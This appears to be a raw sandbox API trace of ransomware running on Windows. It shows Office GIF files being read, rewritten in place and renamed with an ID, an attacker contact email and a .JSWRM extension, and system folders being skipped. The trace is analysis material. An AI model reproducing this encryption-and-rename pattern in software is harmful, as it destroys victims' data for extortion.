[0119.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0119.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0119.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0119.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0119.153] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR29F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir29f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.155] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22972) returned 1 [0119.155] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x59b0) returned 0x24c1d0 [0119.155] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x59b0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x59b0, lpOverlapped=0x0) returned 1 [0119.168] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.168] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x59b0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x59b0, lpOverlapped=0x0) returned 1 [0119.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0119.168] CloseHandle (hObject=0x314) returned 1 [0119.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0119.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0119.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0119.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0119.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0119.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0119.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.169] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR29F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir29f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR29F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir29f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0119.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0119.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0119.181] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad3eea7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad3eea7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb96, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR2B.GIF", cAlternateFileName="")) returned 1 [0119.181] lstrcmpiW (lpString1="PDIR2B.GIF", lpString2=".") returned 1 [0119.181] lstrcmpiW (lpString1="PDIR2B.GIF", lpString2="..") returned 1 [0119.181] lstrcmpiW (lpString1="PDIR2B.GIF", lpString2="...") returned 1 [0119.181] lstrcmpiW (lpString1="PDIR2B.GIF", lpString2="windows") returned -1 [0119.181] lstrcmpiW (lpString1="PDIR2B.GIF", lpString2="recovery") returned -1 [0119.181] lstrcmpiW (lpString1="PDIR2B.GIF", lpString2="perflogs") returned -1 [0119.181] lstrcmpiW (lpString1="PDIR2B.GIF", lpString2="documents and settings") returned 1 [0119.181] lstrcmpiW (lpString1="PDIR2B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.181] lstrcmpiW (lpString1="PDIR2B.GIF", lpString2="system volume information") returned -1 [0119.181] lstrcmpiW (lpString1="PDIR2B.GIF", lpString2="msocache") returned 1 [0119.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0119.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR2B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR2B.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR2B.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0119.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0119.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR2B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR2B.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR2B.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0119.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0119.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0119.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0119.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR2B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir2b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.182] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2966) returned 1 [0119.182] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb90) returned 0x24c1d0 [0119.182] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xb90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0xb90, lpOverlapped=0x0) returned 1 [0119.184] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.184] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0xb90, lpOverlapped=0x0) returned 1 [0119.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0119.184] CloseHandle (hObject=0x314) returned 1 [0119.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0119.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0119.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0119.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0119.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0119.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0119.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.184] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR2B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir2b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR2B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir2b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0119.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0119.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0119.185] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad3eea7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad3eea7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf73, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR2F.GIF", cAlternateFileName="")) returned 1 [0119.185] lstrcmpiW (lpString1="PDIR2F.GIF", lpString2=".") returned 1 [0119.185] lstrcmpiW (lpString1="PDIR2F.GIF", lpString2="..") returned 1 [0119.185] lstrcmpiW (lpString1="PDIR2F.GIF", lpString2="...") returned 1 [0119.185] lstrcmpiW (lpString1="PDIR2F.GIF", lpString2="windows") returned -1 [0119.185] lstrcmpiW (lpString1="PDIR2F.GIF", lpString2="recovery") returned -1 [0119.185] lstrcmpiW (lpString1="PDIR2F.GIF", lpString2="perflogs") returned -1 [0119.185] lstrcmpiW (lpString1="PDIR2F.GIF", lpString2="documents and settings") returned 1 [0119.185] lstrcmpiW (lpString1="PDIR2F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.186] lstrcmpiW (lpString1="PDIR2F.GIF", lpString2="system volume information") returned -1 [0119.186] lstrcmpiW (lpString1="PDIR2F.GIF", lpString2="msocache") returned 1 [0119.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0119.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR2F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR2F.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR2F.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0119.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0119.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR2F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR2F.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR2F.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0119.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0119.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0119.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0119.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR2F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir2f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.186] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3955) returned 1 [0119.187] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf70) returned 0x24c1d0 [0119.187] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xf70, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0xf70, lpOverlapped=0x0) returned 1 [0119.189] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.189] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0xf70, lpOverlapped=0x0) returned 1 [0119.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0119.189] CloseHandle (hObject=0x314) returned 1 [0119.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0119.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0119.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0119.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0119.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0119.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.189] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR2F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir2f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR2F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir2f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0119.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0119.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0119.190] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad3eea7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad3eea7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x332e, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR30B.GIF", cAlternateFileName="")) returned 1 [0119.190] lstrcmpiW (lpString1="PDIR30B.GIF", lpString2=".") returned 1 [0119.191] lstrcmpiW (lpString1="PDIR30B.GIF", lpString2="..") returned 1 [0119.191] lstrcmpiW (lpString1="PDIR30B.GIF", lpString2="...") returned 1 [0119.191] lstrcmpiW (lpString1="PDIR30B.GIF", lpString2="windows") returned -1 [0119.191] lstrcmpiW (lpString1="PDIR30B.GIF", lpString2="recovery") returned -1 [0119.191] lstrcmpiW (lpString1="PDIR30B.GIF", lpString2="perflogs") returned -1 [0119.191] lstrcmpiW (lpString1="PDIR30B.GIF", lpString2="documents and settings") returned 1 [0119.191] lstrcmpiW (lpString1="PDIR30B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.191] lstrcmpiW (lpString1="PDIR30B.GIF", lpString2="system volume information") returned -1 [0119.191] lstrcmpiW (lpString1="PDIR30B.GIF", lpString2="msocache") returned 1 [0119.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0119.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR30B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR30B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR30B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0119.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0119.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR30B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR30B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR30B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0119.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0119.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0119.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0119.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR30B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir30b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.192] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=13102) returned 1 [0119.192] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3320) returned 0x24c1d0 [0119.192] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3320, 